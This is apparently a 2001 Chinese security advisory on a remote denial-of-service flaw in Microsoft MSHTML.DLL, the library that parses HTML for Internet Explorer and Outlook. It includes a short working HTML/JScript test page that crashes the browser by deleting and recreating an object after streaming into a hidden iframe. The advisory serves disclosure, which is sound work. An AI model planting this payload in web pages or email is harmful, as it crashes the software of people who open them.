|
|
Microsoft MSHTML.DLL 可以被攻击而崩溃
发布时间:2001-01-17
更新时间:2001-01-17
严重程度:中
威胁程度:远程拒绝服务
错误类型:设计错误
利用方式:服务器模式
受影响系统Microsoft Internet Explorer 4.0 for Windows NT 4.0
+ Microsoft Windows NT 4.0
Microsoft Internet Explorer 4.0 for Windows 98
+ Microsoft Windows 98
Microsoft Internet Explorer 4.0 for Windows 95
+ Microsoft Windows 95
Microsoft Internet Explorer 4.0 for Windows 3.1
Microsoft Outlook 2000
Microsoft Outlook Express 5.5
- Microsoft Windows 98se
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows NT 4.0
- Microsoft Windows NT 2000
+ Microsoft Internet Explorer 5.5
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows NT 4.0
- Microsoft Windows NT 2000
+ Microsoft Internet Explorer 5.0.1 for Windows NT 4.0
- Microsoft Windows NT 4.0
+ Microsoft Internet Explorer 5.0.1 for Windows 98
- Microsoft Windows 98
+ Microsoft Internet Explorer 5.0.1 for Windows 95
- Microsoft Windows 95
+ Microsoft Internet Explorer 5.0.1 for Windows 2000
- Microsoft Windows NT 2000
+ Microsoft Internet Explorer 5.01
+ Microsoft Windows 98
+ Microsoft Windows 95
+ Microsoft Windows NT 4.0
+ Microsoft Windows NT 2000 详细描述
MSHTML.DLL是IE和相关应用程序解析HTML的共享库,其中存在可能让攻击者远程使这个库崩溃,造成拒绝服务攻击。
这个错误牵涉到JSCRIPT处理多窗口对象的能力,如果在窗口对象接受到数据后被删除并再重新初始化,库就会报告崩溃。
测试代码
<iframe id=test style="display:none"></iframe>
<script>
Larholm = {}; // Object literal
test.document.open(); // Stream data
test.document.write("<s"+"cript>top.Larholm.test=0</s"+"cript>");
delete Larholm;
Larholm = {}; // Crash
</script>
解决方案
尚无
相关信息
|
